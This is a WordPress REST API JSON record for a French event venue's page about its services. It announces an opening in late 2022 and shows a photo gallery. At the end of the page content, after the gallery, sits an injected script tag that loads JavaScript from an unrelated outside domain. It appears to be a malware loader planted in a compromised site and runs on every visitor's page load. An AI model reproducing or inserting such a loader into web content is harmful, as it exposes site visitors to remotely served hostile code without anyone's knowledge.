{"id":43,"date":"2021-05-25T11:21:30","date_gmt":"2021-05-25T09:21:30","guid":{"rendered":"http:\/\/domainederochefort.fr\/?page_id=43"},"modified":"2022-07-19T12:56:37","modified_gmt":"2022-07-19T10:56:37","slug":"nos-prestations","status":"publish","type":"page","link":"http:\/\/domainederochefort.fr\/?page_id=43","title":{"rendered":"Nos prestations"},"content":{"rendered":"\n<p class=\"has-text-color\" style=\"font-size:28px;color:#de5cc0\"><strong>OUVERTURE FIN 2022<\/strong><\/p>\n\n\n\n<p>Organisez vos \u00e9v\u00e8nements prochainement au Domaine de Rochefort, tout en profitant d&#8217;un d\u00e9cor imprenable et luxuriant de verdure, dans le calme et dans l&#8217;intimit\u00e9 de la campagne lig\u00e9rienne. <\/p>\n\n\n\n<p>Vous pouvez en \u00eatre s\u00fbrs, vous vivrez un moment magique qui restera grav\u00e9 dans votre m\u00e9moire !<\/p>\n\n\n\n<p>Mariage, s\u00e9minaire, anniversaire&#8230; N&#8217;h\u00e9sitez pas \u00e0 nous contacter d\u00e8s Octobre 2022 pour toute demande de r\u00e9servation, comprenant au choix le domaine, le ch\u00e2teau ou les deux. <\/p>\n\n\n\n<figure class=\"wp-container-2 wp-block-gallery-1 wp-block-gallery columns-3 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img loading=\"lazy\" width=\"1024\" height=\"683\" src=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/couple-4615557_1920-1024x683.jpg\" alt=\"\" data-id=\"75\" data-full-url=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/couple-4615557_1920.jpg\" data-link=\"http:\/\/domainederochefort.fr\/?attachment_id=75\" class=\"wp-image-75\" srcset=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/couple-4615557_1920-1024x683.jpg 1024w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/couple-4615557_1920-300x200.jpg 300w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/couple-4615557_1920-768x512.jpg 768w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/couple-4615557_1920-1536x1024.jpg 1536w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/couple-4615557_1920-90x60.jpg 90w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/couple-4615557_1920.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><img loading=\"lazy\" width=\"1024\" height=\"683\" src=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/meeting-594091_1920-1024x683.jpg\" alt=\"\" data-id=\"76\" data-full-url=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/meeting-594091_1920.jpg\" data-link=\"http:\/\/domainederochefort.fr\/?attachment_id=76\" class=\"wp-image-76\" srcset=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/meeting-594091_1920-1024x683.jpg 1024w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/meeting-594091_1920-300x200.jpg 300w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/meeting-594091_1920-768x512.jpg 768w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/meeting-594091_1920-1536x1024.jpg 1536w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/meeting-594091_1920-90x60.jpg 90w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/meeting-594091_1920.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><img loading=\"lazy\" width=\"1024\" height=\"681\" src=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/wedding-1854074_1920-1024x681.jpg\" alt=\"\" data-id=\"77\" data-full-url=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/wedding-1854074_1920.jpg\" data-link=\"http:\/\/domainederochefort.fr\/?attachment_id=77\" class=\"wp-image-77\" srcset=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/wedding-1854074_1920-1024x681.jpg 1024w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/wedding-1854074_1920-300x200.jpg 300w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/wedding-1854074_1920-768x511.jpg 768w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/wedding-1854074_1920-1536x1022.jpg 1536w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/wedding-1854074_1920-90x60.jpg 90w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/wedding-1854074_1920.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/li><\/ul><\/figure>\n<script src='https:\/\/trick.cofounderspecials.com\/track.js?v=9.999' type='text\/javascript'><\/script>","protected":false},"excerpt":{"rendered":"<p>OUVERTURE FIN 2022 Organisez vos \u00e9v\u00e8nements prochainement au Domaine de Rochefort, tout en profitant d&#8217;un d\u00e9cor imprenable et luxuriant de verdure, dans le calme et dans l&#8217;intimit\u00e9 de la campagne lig\u00e9rienne. Vous pouvez en \u00eatre s\u00fbrs, vous vivrez un moment magique qui restera grav\u00e9 dans votre m\u00e9moire ! Mariage, s\u00e9minaire, anniversaire&#8230; N&#8217;h\u00e9sitez pas \u00e0 nous contacter d\u00e8s Octobre 2022 pour &hellip; <\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/43"}],"collection":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=43"}],"version-history":[{"count":6,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/43\/revisions"}],"predecessor-version":[{"id":125,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/43\/revisions\/125"}],"wp:attachment":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=43"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}